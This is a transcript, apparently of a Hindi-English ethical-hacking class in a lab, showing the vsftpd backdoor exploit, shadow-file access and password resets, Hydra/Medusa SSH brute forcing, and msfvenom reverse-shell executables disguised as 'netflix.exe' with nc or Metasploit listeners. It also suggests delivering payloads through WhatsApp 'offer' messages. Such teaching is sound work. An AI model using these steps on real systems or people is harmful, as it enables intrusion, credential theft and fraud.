इंफॉर्मेशन हमारे पास आई है, मतलब कौन सी डायरेक्टरी में। लेट्स चेक, हम सबसे रूट डायरेक्टरी में, जो सबसे स्टार्टिंग वाली डायरेक्टरी होती है, Sir, how to get that credentials? for अच्छा MSF admin. Now you can do one thing. See, now it has already given the username login with MSF admin and MSF admin. Okay, but let's say इसने आपको credentials दिए नहीं थे. Okay, so what you can do ls home. ls home में क्या होता है, इस वाले डायरेक्टरी में क्या होता है, आपके सारे यूजर्स स्टोर होते हैं। तो आपको यहाँ से दिख जाएगा कौन कौन से यूजर्स अवेलेबल हैं इस वाले सिस्टम में। तो आपके पास एक यूजर FTP, आपके पास एक यूजर MSF एडमिन है, आपके पास सर्विस है, आपके पास यूजर है, तो आपको पता चल गया कि MSF एडमिन यूजर है। देन मैंने आपको एक बताया था कि अगर किसी के भी पासवर्ड आपको चेंज करना है, किसी भी सिस्टम का पासवर्ड चेंज करना, यू कैन डू pass wd।
इवन दो आप इसमें हैश इंजेक्शन भी कर सकते हैं, जो हमने लास्ट क्लास में बात करी थी, जहाँ पे शैडो फाइल में आपका, आप देख सकते हैं यहाँ पे, जस्ट अ सेकेंड, रूट यूजर का पासवर्ड इस हैश फॉर्म में, एंड फॉर एमएसएफ एडमिन लेट मी सी, वी कैन डू दिस cat etc shadow grep msf admin। तो आप देख सकते हैं सीधा सीधा एमएसएफ एडमिन का मेरे पास हैश आ चुका है। मैं क्या कर सकता हूँ, इस हैश को क्रैक करने की ट्राई कर सकता हूँ ऑनलाइन, या फिर मैं अपना खुद का एक हैश क्रिएट करके यहाँ से रिप्लेस कर सकता हूँ, क्योंकि मैं रूट यूजर है, मैं कुछ भी कर सकता हूँ इसमें। या फिर अगर आप रूट यूजर ऑलरेडी हो तो सीधा सीधा पास wd msf admin, एंड आप एक नया क्या बोलते हैं पासवर्ड सेट कर सकते हैं। लेट्स से पासवर्ड इज हेलो एंड it will ask for me hello again. Now password updated successfully. Now if I want to log in MSF admin, and then password is hello, and you can see now I logged in into MSF admin. Now Sir, as you can see, we were exploiting into FTP vulnerability. So if we didn't find any shell in FTP, then what we need to do again? sorry, you didn't find any shell in FTP. No, you don't have to. This vulnerability is directly giving the access for you for the system. It actually depends on vulnerability also. आपका जो vulnerability यहाँ पे थी वो सिस्टम को सीधा सीधा सिस्टम के अंदर घुस रहा था FTP के थ्रू। ऑलराइट, हमें FTP के अंदर पहले लॉगिन करने की जरूरत नहीं पड़ी, बिकॉज जो vulnerability वर्जन, जो vulnerable था, क्या बोलते हैं अपना FTP का वर्जन, वो कुछ स्पेसिफिक चीजों पे काम करता है। लेट मी शो यू 2.3.4। It is slow. See, you can see this, the description you can read for all the vulnerabilities. This module exploits a malicious backdoor that was added to VSFTPD download archive. This backdoor was introduced into VSFT 2.3.4 archive between June 30th and 1st, according to. So there was one backdoor which was in this specific, let's say, the service, and we are exploiting that specific backdoor. And what is backdoor? Backdoor actually gives the access to your whole system. जब हम मालवेयर थ्रेड्स की बात करेंगे उसमें हम बैकडोर्स की बात करेंगे। बैकडोर इज बेसिकली नथिंग, जब आपको बैकग्राउंड में, जैसे आप देख सकते हैं बैकडोर के नाम से भी आप देख सकते हैं, आइडिया लगा सकते हैं कि बैकग्राउंड में रन करके आपको ये एक्सेस सिस्टम का देता रहेगा। तो इस वाले वर्जन में क्या हुआ था, उन्होंने डेवलपर्स ने बैकडोर डाल दिया था, एंड थोड़े बहुत हैकर्स को पता चल गया इस बैकडोर के बारे में, सो दे स्टार्टेड एक्सप्लॉइटिंग दिस वर्जन। exploiting the systems which are running on the same version. So let's say now I want the access for root user, because if I do su root and if I enter any password because I don't know, hello I have entered and it says authentication failure. Let's enter MSF admin. It says authentication failure. Now let me change the password for root and let me give tour. And now let's try su root and let me give tour, and you can see now I'm a root user because my dollar is changed into hash. So that's how we took the access for our of a Linux system using okay, let's go ahead then. So Sir, all these things will be explained while we were doing Metasploit. while you were Metasploit. sure, Bhaiya. Just a second. Yeah, what you were saying?
Like I was telling that all these things will be explained in detail while we were doing Metasploit, right? Yeah, exactly. So it's in system hacking only. If you didn't get anything, you can ask me now also. Okay, sir. Okay. एंड आई वांट यू, मतलब मैं चाहता हूँ कि आप लोग भी फॉर्म करो इन चीजों को. सो मेटास्प्लॉइटेबल तो मैंने हैक कर दिया, मतलब एक्सेस ले लिया मेटास्प्लॉइटेबल का. व्हाट यू कैन डू इज यू कैन प्रैक्टिस फर्स्ट. आप प्रैक्टिस करो मेटास्प्लॉइटेबल के ऊपर ही, एंड देन मैंने आपको एक मशीन के बारे में बताया था व्हिच इज दिस ब्लू मशीन. ओके, आपको पता ही है ट्राई हैक पे कनेक्ट कैसे करना है आपको. ओपन वीपीएन एंड देन आपकी जो फाइल नेम था उसके बाद आप कनेक्ट. अगर आप चाहते हैं तो आप मेटास्प्लॉइट टेबल के मॉड्यूल जो ऑक्सिलरी मॉड्यूल्स हैं उसके साथ भी आप स्कैन कर सकते हैं उसके थ्रू भी, एंड चेक कर सकते हैं कौन कौन से स्पेसिफिक वर्जन चल रहे हैं, एंड देन फाइंड द एक्सप्लॉइट इन द मेटास्प्लॉइट. मेटास्प्लॉइट के अंदर ही एक्सप्लॉइट्स होंगे उसके, क्या बोलते हैं, उन वर्जन्स के, एंड उनको लोड करके आप इस सिस्टम के अगेंस्ट यूज करना और आपको इस सिस्टम का एक्सेस मिल जाएगा. So that was all basics about Metasploit. Just a second. We talked about password cracking also, right? हमने डिक्शनरी अटैक, ब्रूट फोर्स अटैक की बात करी थी, तो हम देख लेते हैं वो डिक्शनरी अटैक हम परफॉर्म कैसे करते हैं. तो काली के अंदर डिफरेंट डिफरेंट टूल्स होते हैं. आप इवन मेटास्प्लॉइट के थ्रू भी कर सकते हो. मेटास्प्लॉइट के बाद लेट्स मी चेक इफ दिस एक्सप्लॉइट इज अवेलेबल इन मेटास्प्लॉइट और नॉट. जस्ट अ सेकंड. to ls user share Metasploit. And let's go for, I think, Linux. We have for SSH. Do we have a script for brute forcing? No, I don't think so. No, the script is not there. Let me check in Unix. SSH, and we don't have the password. Okay, let me open the Metasploit console. Check, let's say, I think कोई और नाम था उसको SSH को brute force करने का. But let's try with different tools. One is Hydra, which is pre-installed in your Kali Linux. You can see the help menu for the Hydra, and you can see कि उसको usage, मतलब Hydra को use करना कैसे है, -l login -p password. हम अभी use करके देखेंगे इसको. And I think another one is Medusa. एंड आपके पास बहुत सारे टूल्स हैं ऐसे. आप GitHub से भी खुद brute forcer डाउनलोड कर सकते हो. बस you have to just search for that. Let's say GitHub SSH brute forcer, एंड आपके पास बहुत सारे SSH brute forcer आ जाएंगे. SSH brute forcer किसी ने ये बनाया है, किसी ने ये बनाया है, SSH putty login brute forcer, SSH brute force, and you can even use these tools also. तो अभी तो हम खाली हाइड्रा यूज करते हैं एंड देखते हैं ये वो कैसे करता है. सो हाइड्रा के लिए पहले क्या करना पड़ेगा, हमने एक डिक्शनरी अटैक करना है. तो उसके लिए हमें डिक्शनरी तो ऑब्वियस सी बात है होनी चाहिए, मतलब एक पासवर्ड लिस्ट होना चाहिए और एक यूजर नेम लिस्ट होना चाहिए. सो अगर हम हाइड्रा के यूसेज देखें तो आप देख सकते हैं यहाँ पे इसने इवन आप FTP भी ब्रूट फोर्स कर सकते हो, एंड इवन जो आपके मतलब वेबसाइट पे चलते हैं ना, वेबसाइट्स पे यूजर नेम एंड पासवर्ड मांगता है, वो भी आप ब्रूट फोर्स यहाँ के थ्रू कर सकते हो हाइड्रा के थ्रू.
बट हम देख सकते हैं यहाँ पे एग्जांपल्स में हाइफन स्मॉल एल यूज करके यूजर नेम लिखना है आपको, हाइफन कैपिटल पी यूज करके पासवर्ड लिस्ट प्रोवाइड कर देनी है आपको. सो जस्ट लेट मी चेक in this file. Okay, let me try this first. Let's say, let me change the password for MSF admin because it's too easy. Let me change it like MSF admin pass. Then let me go over here. Let me आपके लिए डिक्शनरी जो है, जो वर्ड लिस्ट है आपके लिए ऑलरेडी काली प्रोवाइड करता है, बहुत सारी वर्ड लिस्ट आप यूज कर सकते हैं. एंड वो सारी स्टोर कहाँ पे होती है, मैंने आपको एक दिन भी दिखाया था. इट इज इन यूजर, जस्ट अ सेकंड, यूजर शेयर वर्ड लिस्ट. ये आपकी डायरेक्टरी है वर्ड लिस्ट करके. यहाँ पे आपकी सारे आपके जितने भी वर्ड लिस्ट हैं यहाँ पे स्टोर होते हैं. एक फास्ट ट्रैक वर्ड लिस्ट होती है, एक आपकी rocky.txt. rocky.txt थोड़ी बड़ी वर्ड लिस्ट है, इसलिए वो .gz कर रखा है, उसको जिप कर रखा है उसको. हम अभी फास्ट ट्रैक यूज करते हैं क्योंकि फास्ट ट्रैक में थोड़े कम वो है, क्या बोलते हैं, थोड़ी छोटी वर्ड लिस्ट है. सो लेट मी जस्ट कॉपी. cp इज द कॉपी कमांड. cp अगर आपको कॉपी करना हो, कोई फाइल कॉपी करनी हो कहीं ना कहीं से, तो आपको cp कमांड यूज करते हो. cp देन फाइल का आपको पाथ देना पड़ता है, एंड देन वो वाला पाथ देना पड़ता है जहां पे आपको कॉपी करना है. लेट्स से मेरे को ये वाली फाइल, फास्ट ट्रैक वाली फाइल कॉपी करनी है, तो मैं फास्ट ट्रैक का पूरा एक पाथ दे दूंगा, सॉरी फॉर दैट. एंड देन मैं उसको पाथ दूंगा कि मेरे को कहाँ कॉपी करना है. तो आई विल, मैं जिस डायरेक्टरी में हूँ मेरे को उस डायरेक्टरी में कॉपी करवाना है, तो आई विल जस्ट गिव डॉट एंड देन एंटर. जस्ट अ सेकेंड. सॉरी फॉर दैट. तो आपको मैंने सीपी कमांड के बारे में बता रहा था. सीपी कमांड में आपको वो फाइल देनी पड़ती है मैंने आपको दे दी फास्ट ट्रैक .txt, और मेरे को कॉपी कहाँ करनी है, वो मेरे को अपनी डायरेक्टरी में कॉपी करनी है. मैं सिंपली डॉट लिख दूंगा, तब मैं ls करूंगा तो आप देख सकते हैं फास्ट ट्रैक .txt मेरे डायरेक्टरी में कॉपी हो चुकी है. आप इसको कैट भी कर सकते हैं. आप देख सकते हैं कौन कौन सी चीजें इसके अंदर हैं. बहुत सारे पासवर्ड्स एंड बहुत सारे मतलब यूजर नेम्स इसके अंदर आपको मिल जाएंगे. सो लेट्स से, लेट्स क्रिएट अ वर्ड लिस्ट फॉर यूजर नेम. ये तो आपकी जो fastrad.txt हो गई, वो आपका उसका पासवर्ड हो गया, क्या बोलते हैं, पासवर्ड वाली फाइल हो गई. लेट मी क्रिएट अ वर्ड लिस्ट फॉर यूजर नेम व्हिच इज touch password.txt is already created. Let me check if it's something is there or not. Yeah, already password है इसके अंदर. Let me create a username.txt and username.txt already exists.
रूट एडमिन एडमिनिस्ट्रेटर एमएसएफ एडमिन 1 2 3 ओके username.txt भी इसके अंदर अवेलेबल है. सो अब मेरे को सिंपली क्या करना है, मेरे को password.txt and username.txt मैं हाइड्रा यूज करूंगा. हाइड्रा -l I can give username.txt -p and I can give password.txt. okay, then I have to provide कि ये जो brute force, जो डिक्शनरी अटैक हम कर रहे हैं, वर्ड लिस्ट अटैक हम कर रहे हैं, ये करना किधर है? ये करना है हमें SSH पे. और कौन सी आईपी के SSH पे? हमारी मेटास्प्लॉइट टेबल के आईपी के SSH पे. तो लेट्स मी गिव 48. तो अगर ये सारे पॉसिबल कॉम्बिनेशन ट्राई करेगा, हर एक यूजर नेम के लिए हर एक पासवर्ड कॉम्बिनेशन ट्राई करेगा एंड बहुत जल्दी जल्दी ब्रूट फोर्स मारने का कोशिश करेगा एंड चेक करेगा कि इससे एक्सेस मिल रहा है या नहीं मिल रहा. अगर एक्सेस नहीं मिलता तो इट विल से कि ये इस वर्ल्ड लिस्ट में आपका यूजर नेम और पासवर्ड एग्जिस्ट नहीं करता था. बट अगर एक्सेस मिल जाता है तो इट विल शो यू द स्पेसिफिक यूजर नेम एंड स्पेसिफिक पासवर्ड. तो लेट मी स्टार्ट दिस एंड यू कैन सी ये बैकग्राउंड में चल रहा है and 7 targets did not resolve. It says what this target did not resolve or could not be connected. Let me just check what happened. This is protocol error. Really? It's working, I think. Let me just add some threads in it and let me do it this. Let's see. Is it working? Let's wait for the test. कुछ एरर आ रहा है इसके अंदर. I don't know. I have to check for it. Tag finished for 192, but it didn't perform any tag. One target completed 0 well password form. Why it's saying that? They've changed a lot of things in the new Kali. Let me try MintOS for a second. I don't know. It didn't.
Let's see if it's working or not. Let me try with Medusa. It's not working. Username.txt, I think the password. Loading user supplied password file. Let me go password.txt. Oh, okay, at last. I don't think ये पासवर्ड ढूंढ पाएगा because मैंने इसमें रियल पासवर्ड कुछ और ही रखा था. Let me change the password. Let me do password MSF admin. It could be okay. मेडिसो थोड़ा स्लो है एंड इसने एक्चुअली पासवर्ड निकाल दिया है, which is this one. मैं इसको कंट्रोल सी कर देता हूँ एंड आप देख सकते हैं इसने यहाँ पे सक्सेस बोल रहा है विद यूजर MSF admin एंड पासवर्ड हेलो. एंड अब सीधा सीधा आप सर्च कर सकते हैं इसके अंदर. जस्ट लेट मी शो यू SSH जो हमारा यूजर नेम है विच इज MSF admin @ IP एड्रेस हमारे मेटास्प्लॉइटेबल की विच इज 48. देन इसने पूछा पासवर्ड क्या है. पासवर्ड यहाँ पे हमने क्रैक कर दिया विच इज हेलो. एंड नाउ हमें अपने मेटास्प्लॉइटेबल का शेल मिल गया है हमें अपने लिनक्स सिस्टम के अंदर. तो ये था आपका पासवर्ड ट्रैकिंग टेक्निक्स. जो ये एक्चुअली जो पासवर्ड ट्रैकिंग है ये आप इसको स्पीड अप भी कर सकते हो. ये अभी आप देख सकते हैं कितना स्लो चल रहा था. स्पीड अप के लिए आपको क्या होना चाहिए, बहुत सारे अच्छे अच्छे रिसोर्सेज चाहिए. जितने भी आप सुना होगा, आपने देखा भी होगा टेलीग्राम ग्रुप्स पे कि नेटफ्लिक्स के अकाउंट बेच रहे हैं, वो स्पॉटिफाई के अकाउंट बेच रहे हैं बड़े सस्ते सस्ते में 50 रुपए में 10 रुपए में ऑल ऑफ दैट. तो हो क्या रहा है, वो क्रैकिंग ही तो कर रहे हैं बैकग्राउंड में. क्रैक कर रहे हैं, वो यूजर नेम की लिस्ट डाल रहे हैं बहुत बड़ी एंड पासवर्ड की लिस्ट डाल रहे हैं एंड सबका कॉम्बिनेशन ट्राई करते जा रहे हैं करते जा रहे हैं करते जा रहे हैं. एंड वो 1-2 महीने 3-4 महीने तक चलाते रहते हैं अपना ये क्या बोलते हैं ब्रूट फोर्स एंड ट्राई करते रहते हैं कि कभी ना कभी पासवर्ड क्या बोलते हैं कभी ना कभी सक्सेस आएगा या नहीं आएगा. और अगर सक्सेस आ गया तो उनको वो अकाउंट मिल जाता है और उसको टेलीग्राम पे वो 50 रुपए या फिर 100 रुपए में बेच देते हैं. यही होता है आपका सीधा क्रैकिंग में, पासवर्ड क्रैकिंग में यही काम होता है. इसलिए बोलते हैं कि आपका पासवर्ड है वो
थोड़ा स्ट्रॉन्ग रखिए, ऐसे नॉर्मल हेलो की तरह ना रखिए। एंड जितने भी नॉर्मल पासवर्ड हमने इसके अंदर देखे थे लिस्ट के अंदर, एमएसएफ एडमिन, रूट एडमिन, एडमिन पासवर्ड एंड ऑल दैट। सो मैं इसमें से एग्जिट कर लेता हूँ। क्लियर? ओके, नाउ हमने देखे इसमें पासवर्ड क्रैकिंग, हमने देखे मेटास्प्लॉइटेबल के थ्रू किसी सिस्टम को एक्सप्लॉइट कैसे करना है। नाउ लेट्स गो ऑन टू, जस्ट अ सेकंड। और हाइड्रा क्यों नहीं चल रहा? हाइड्रा इज एक्चुअली ज्यादा फास्ट है मेड्यूसा से, बट आई डोंट नो व्हाई इट्स नॉट वर्किंग राइट नाउ। जस्ट अ सेकंड, लेट मी चेक अगेन। -L, let me give user which is MSF admin। किसी के पास पुरानी कहानी है आप में से? एक बार पुरानी कहानी पे ट्राई करना, बिकॉज लास्ट टाइम मैंने जब हाइड्रा यूज किया था इट वाज वर्किंग वेरी फाइन। ओके, सो इसने ये वाला क्या बोलते हैं सिंटैक्स एक्सेप्ट किया है, बल्कि ये वाला सिंटैक्स एक्सेप्ट नहीं किया इसने, जो FTP :// करके है। तो आप देख सकते हैं इसने भी हमारा यहाँ पे पासवर्ड निकाल दिया, बट इसने कुछ ज्यादा जल्दी निकाल दिया। मेड्यूसा में एक एक करके प्रिंट कर रहा था वो, यहाँ पे इसने हमारा बहुत जल्दी इसने प्रोसेस किया, बहुत जल्दी ब्रूट फोर्स किया एंड पासवर्ड इसने निकाल दिया, लॉगिन विच इज MSF admin एंड पासवर्ड इज हेलो। सो एक्चुअली मेरे को 2 मशीन देनी थी आपको, एक ब्रूट फोर्स के ऊपर भी थी एक मशीन, बट मैं वो नेक्स्ट क्लास में दूंगा आपको। आपका आज का टास्क यही है कि आप ये वाली मशीन जाइए, इसका एक्सेस लीजिए विंडोज मशीन का। And let's talk about getting access using, let's say, using applications। अब मैं चाहता हूं कि मैं अपने विक्टिम के कंप्यूटर में ऐसा एप्लीकेशन रन करवाऊं जिससे कि मेरे सिस्टम में एक्सेस आ जाए। ओके, तो उसके लिए क्या करना पड़ता है आपको? उसके लिए आप मेटास्प्लॉइट ही यूज कर सकते हो। मेटास्प्लॉइट आपका पेलोड क्रिएट करता है। एंड मेटास्प्लॉइट पेलोड कैसे क्रिएट करता है? उसके लिए हम MSF Venom यूज करते हैं। MSF कंसोल से आप मेटास्प्लॉइट का फ्रेमवर्क स्टार्ट करते हो। MSF Venom से आप एक पेलोड क्रिएट करते हो, एक खुद की एक वायरस फाइल जनरेट करते हो जो मेलिशियस फाइल है। ठीक है, तो MSF Venom -p फॉर पेलोड। देन हमें विंडोज, लेट्स से हमें विंडोज टारगेट वो करना है। मेरे पास ये 2 सिस्टम है। जस्ट अ सेकंड, मैं आपको स्क्रीन शेयर कर देता हूँ, आपको स्क्रीन दिखा देता हूँ। मेरे पास ये सिस्टम है, मेरा लिनक्स सिस्टम जो वर्चुअल एनवायरनमेंट में, ये मेरा अटैकर है, ये हैकर है मेरा। और मेरे को जो सिस्टम एक्सेस करना वो है ये मेरा विंडोज सिस्टम जो मेरा होस्ट मशीन पे है। तो इसका एक्सेस कैसे लूंगा मैं? लेट मी गो बैक टू माय मशीन, लेट मी स्विच ऑफ दिस। ओके, सो -p, then I'll create a Windows Meterpreter reverse TCP lhost equals 192.168। जस्ट अ सेकंड, मैं इसको देख लूं। मैं अभी ये सारी चीजें समझाता हूँ आपको, ये कैसे क्या क्या चीजें मैं एंटर कर रहा हूँ इसमें। ओके, तो यहाँ पे क्या कर रहे हैं हम? MSF Venom यूज कर रहे हैं क्या करने के लिए? हम एक अपना पेलोड जनरेट कर रहे हैं। किसके लिए? विंडोज के लिए। ये ऑलरेडी पेलोड होता है अवेलेबल, आप इसको देख भी, इवन आप इसको चेक भी कर सकते हैं पेलोड्स कहाँ पे आपको मिलेंगे। मैंने आपको ऑलरेडी वो बता दिया है, विच इज यूजर शेयर मेटास्प्लॉइट फ्रेमवर्क एंड मॉड्यूल्स के अंदर, पेलोड्स के अंदर यू हैव लाइक सिंगल्स के अंदर and then Windows and you have Meterpreter reverse TCP। तो हम कौन सा पेलोड यूज कर रहे हैं? Meterpreter reverse TCP वाला पेलोड। इसका मतलब क्या है? इसका मतलब ये है कि हमें एक रिवर्स TCP कनेक्शन चाहिए।
रिवर्स टीसीपी कनेक्शन कहाँ का चाहिए? हमें अपने विक्टिम का चाहिए, विक्टिम के सिस्टम का चाहिए। तो उसके लिए हम ये वाला पेलोड यूज करेंगे, विंडोज बेटर बेटर रिवर्स टीसीपी। फिर हमें प्रोवाइड करना होता है एल होस्ट एंड एल पोर्ट। एल होस्ट जो आपका लोकल होस्ट होता है एंड एल पोर्ट जो होता है आपका लोकल पोर्ट होता है। तो एल होस्ट मतलब आपको जो आपके जिससे अटैक कर रहे हो आप उसकी सिस्टम का आईपी एड्रेस, क्योंकि जब ये वहां जाके एग्जीक्यूट होगा तो उसको पता होना चाहिए ना कि जितना भी टीसीपी कनेक्शन, जितना भी वो पोर्टल बनाएगा, सॉरी जितना भी वो टीसीपी कनेक्शन बनाएगा, तो वो कहाँ जाके बनाएगा, तो वो मेरे इस पे अटैकर वाले सिस्टम पे बनाएगा 17 वाले पे। देन मैं एक पोर्ट ओपन कर दूंगा अपने उसमें, एल पोर्ट लिख के सीधा सीधा एक पोर्ट में लिसन करता रहूंगा कि क्या वो क्या बोलते हैं, यहाँ से कोई इन्फॉर्मेशन आ रही है या नहीं आ रही। देन हाइफन एफ मैंने इसलिए लगाया, ये फॉर्मेट दिखा रहा है कि जो मेरा पेलोड बने वो कौन से फॉर्मेट में बने। वो AXE का एक फॉर्मेट है जो एग्जीक्यूटेबल होता है आपका विंडोज के अंदर। एंड देन ग्रेटर देन साइन लगा के मैंने आउटपुट कर दिया कहाँ पे, virus.exe में, जो आपका फाइल का नेम है। तो आप एंटर मारेंगे तो आपका एक पेलोड क्रिएट करेगा। तो आप देख सकते हैं इसमें मेरा पेलोड क्रिएट करा है, इसमें बोला है कि नो एनकोडर स्पेसिफाइड, आउटपुटिंग रॉ पेलोड, पेलोड साइज आपको बता दिया 354 बाइट्स का है, एंड फाइनल साइज ऑफ EXE फाइल आपको बता दिया 73802 बाइट्स का है। इवन आप पेलोड एनकोडर्स वगैरह और रिविजन टेक्निक भी यूज कर सकते हैं, बट अभी के लिए हम नॉर्मल पेलोड देखते हैं। अगर आप LS करोगे आप देख सकते हैं वी हैव virus.exe। सो ये virus.exe आप कैसे ना कैसे करके आपको उसके सिस्टम के उनके कंप्यूटर में ये रन करवाना है, और पहले उससे पहले आपको डिलीवर करवाना है। तो डिलीवर के लिए बहुत सारे टेक्निक्स होते हैं, सोशल इंजीनियरिंग यूज कर सकते हो आप, मेल के थ्रू आप डिलीवर करवा सकते हो, बोल सकते हो, आप उनको मैसेज कर सकते हो, व्हाट्सएप पे मैसेज कर सकते हो कि ये ऑफर चल रहा है और ऑफर पे आपको ये पहले फाइल डाउनलोड करनी पड़ेगी एंड देन इसको रन करना पड़ेगा, देन आपको ये ऑफर कंप्लीट होगा एंड ऑल ऑफ दैट। तो ये सारी चीजें कर सकते हो। अभी के लिए मैं क्या करता हूँ, एक अपना सर्वर एक होस्ट कर देता हूँ इसी पे ही। लेट मी होस्ट माय सर्वर, और मैं अपने विंडोज मशीन में जाऊंगा। तो आप देख सकते हैं मेरा जितने भी क्या बोलते हैं फाइल्स एंड फोल्डर्स हैं वो मेरा ऑलरेडी लिस्ट हो चुका है। मेरे को कौन सी फाइल में इंटरेस्टेड है, virus.exe जो मैंने अभी क्रिएट करी है, मैं इसको डाउनलोड कर लूंगा अपने सिस्टम में। फोल्डर में ओपन करके देखते हैं। तो आप देख सकते हैं virus.exe मेरे सिस्टम में डाउनलोड हो चुका है। बट उससे पहले मेरे को क्या करना पड़ेगा, उससे पहले मेरे को एक लिसनर ऑन करना पड़ेगा, क्योंकि अगर मैं अभी एग्जीक्यूट करूंगा, लेट्स से मैं अभी इस पर डबल क्लिक करूंगा, सॉरी प्रोग्राम्स, डबल क्लिक करूंगा, ये एग्जीक्यूट तो हो रहा है बट मेरे पास एक्सेस नहीं आ रहा। एक्सेस क्यों नहीं आ रहा? क्योंकि मैंने एक लिसनर ऑन नहीं किया, मैंने कोई लिसनर ऑन ही नहीं किया यहाँ पे। मेरे को लिसन भी तो करना पड़ेगा कि उस पोर्ट जो मैंने ऊपर पोर्ट स्पेसिफाई किया था और ये आईपी स्पेसिफाई करी थी कि ये इसमें लिसन करे। तो कैसे करता है, लेट मी ओपन अनदर विंडो। इस विंडो में मैं MSF कंसोल खोल लेता हूँ। तो एक्सप्लॉइट के अंदर एक चीज होती है मल्टी हैंडलर करके, यूज एक्सप्लॉइट मल्टी हैंडलर। ये आपको लिसन करने का यूज करवाता है ये वाला एक्सप्लॉइट आपको। अब आप देख सकते हैं मैंने जब यूज एक्सप्लॉइट मल्टी हैंडलर किया तो ये मेरा एक्सप्लॉइट लोड हो चुका है। लेट्स चेक फॉर ऑप्शंस, एंड ऑप्शंस में आप देख सकते हैं इसमें दो चीजें मांगी यहाँ पे, एल होस्ट एंड एल पोर्ट। एल पोर्ट मैंने ऑलरेडी स्पेसिफाई कर दिया 4444, जो मैंने जब अपना पेलोड क्रिएट कर रहा था तब मैं बना रहा था। एल पोर्ट जब मैंने दिया था, एल होस्ट मतलब मेरी मशीन की आईपी। तो मेरी मशीन की आईपी में सेट कर देता हूँ विच इज 17, राइट। So the options fail to validate value is not a valid option for L, or not for the L port, sorry L host, L port तो already set है। Okay, now options देखेंगे, अब देखेंगे कोई required तो नहीं है and कुछ required नहीं है। Let's run this। So इसने एक started reverse TCP handler on कर दिया है। अब क्या होगा, अब जब भी मेरी इस फाइल पे just a second, मेरी इस फाइल पे मतलब जो नॉर्मल यूजर होगा इसको एग्जीक्यूट करने की कोशिश करेगा, तो मेरी काली की मशीन में मेरे पास कमांड शेल सेशन 1 ओपन आ जाएगा, मेरे पास उसका सेशन आ जाएगा। अब मेरे पास पूरा उसका सिस्टम का एक्सेस है। थोड़ा टाइम देते हैं इसको, जस्ट अ सेकंड।
इवन दो आप यहाँ पे देख भी सकते हैं कि ये जो टीसीपी कनेक्शन बना है ये कहाँ से कहाँ तक के लिए है, मतलब क्या इसका पाथ है, मतलब कौन कौन से आईपी और कौन कौन से पोर्ट यूज कर रहा है। तो आप देख सकते हैं मेरे मशीन का 444 पोर्ट यूज कर रहा है, एंड जो विंडोज की मशीन है उसका 52669 पोर्ट यूज कर रहा है इस रिवर्स कनेक्शन के लिए। एंड ये बहुत स्लो है। मेटास्प्लॉइट को बहुत रिसोर्सेज चाहिए होते हैं ये फ्रेमवर्क रन करने के लिए, तो यू गोटा चेक व्हाट इज हैपनिंग। इट्स नॉट वर्किंग, आई डोंट नो व्हाई, पर टाइम लगाता है। आप अपने सिस्टम में चेक करना, आपके सिस्टम में बिल्कुल वर्क करेगा ये। आई थिंक मैं इसका बहुत यूसेज यूज कर रहा हूँ। जस्ट अ सेकंड, तो है यूज जितना है तो इट्स सेइंग आई डोंट नो व्हाई इट्स नॉट वर्किंग। एक मेथड तो ये हो गया, चलो मेटास्प्लॉइट के थ्रू अभी ये वर्क नहीं कर रहा, नहीं तो आपके पास सीधा सीधा शेल आ जाता है। आप सिर्फ फिर कमांड एंटर करके चेक कर सकते हैं क्या क्या फाइल्स हैं मेरे विंडोज सिस्टम के अंदर, क्या क्या ऑप्शंस हैं, ऑल ऑफ दैट। बट लेट्स से कि या लेट्स से कि मेरे पास मेटास्प्लॉइट है ही नहीं, बट मैंने ये पेलोड क्रिएट कर लिया, तो अब मैं क्या, मेरे पास दूसरा ऑप्शन क्या होता है ये लिसनर ऑन करने का। तो आपकी काली में ना एक कमांड है नेटकैट करके, आप नेटकैट सॉरी आप नेटकैट की हेल्प भी देखोगे तो आपको इसमें डिफरेंट डिफरेंट ऑप्शन दिखेंगे। ये आपका लिसनर ऑन करने के लिए कमांड यूज की जाती है। तो आप एनसी लिखो या फिर नेटकैट लिखो, एक ही बात है। तो मैं यहाँ पे एनसी लिख देता हूँ, फिर मैं लिखूंगा -LVNT। तो अगर आप इसकी हेल्प में नहीं देखोगे तो हम LVNP यूज क्यों कर रहे हैं, तो LVNP हम एल को हम स्पेसिफाई करते हैं कि हम लिसन करना चाहते हैं, हम एक लिसनर ऑन करना चाहते हैं। वी होता है आपका वर्बोस के लिए, आपको इन्फॉर्मेशन सारी देता रहे जितने भी उस टीसीपी कनेक्शन के थ्रू आती रहती है। देन आपका एन होता है आपका आईपी एड्रेस नो डीएनएस, मतलब कोई डीएनएस बीच में रिजॉल्व ना करे। एंड देन पी होता है आपका पोर्ट, इसमें कहाँ पे, हाँ ये रहा। इसमें जो पी होता है आपका पोर्ट का यूज होता है। तो अगर मैं NC-LVNP करूं एंड देन पोर्ट स्पेसिफाई करूं विच वाज 4444, अब मैं एंटर मारूं। लेट मी जस्ट गो बैक टू माय विंडोज मशीन एंड start this virus.exe वाली फाइल and let's go back. Now it says connect to 192.168 from this port this, ये तो मतलब हमें कनेक्शन सक्सेसफुली मिल चुका है, बट स्टिल इसके अंदर भी कमांड यूज नहीं हो रही। व्हाई इज दैट? ओके, मेटर पेटर का सेशन था तो ये मल्टी हैंडलर में यूज होगा। जो मैंने मेटर पेटर वाली बनाई थी, जैसे आपको दिखाता हूँ मैं, पेलोड जो हमने यूज किया है इसके अंदर, हमने पेलोड यूज किया कौन सा वाला, विंडोज मेटर पेटर रिवर्स टीसीपी, ये वाला हमने पेलोड इसके अंदर यूज किया है। ये मेटास्प्लॉइट स्पेशली मेटास्प्लॉइट के लिए यूज होता है। बट अगर लेट से मेरे पास मेटास्प्लॉइट है ही नहीं तो मैं ये वाला क्रिएट कर सकता हूँ, शेल रिवर्स टीसीपी। लेट्स क्रिएट वन फाइल वेरी real quick, -venom-p lhost l पोर्ट दे देते हैं इसको 8080 -f, लेट्स से netflix.exe, सॉरी exe लेना है इसको। ओके, python 3 http/server 8000, अच्छा ऑलरेडी खुला हुआ है ये, सॉरी, ओके इट्स ऑलरेडी ओपन आई थिंक। नेटफ्लिक्स ये रहा netflix.exe, इसको डाउनलोड कर लेते हैं, ओपन द फोल्डर। अब हम चलाते हैं अपना नेटकैट वाली कमांड विच वाज NC-LVNP 8080। अब हम पोर्ट 8080 पे लिसन करना है। अब हमने मेटर पेटर वाला सेशन नहीं दिया था। सो अगर हम जाएंगे, लेट्स गो टू प्रोग्राम्स एंड हमें यहाँ पे दिखता है netflix.exe। अब मैं इसको डबल क्लिक करूंगा, मेरी काली मशीन में क्या होगा, मेरे को
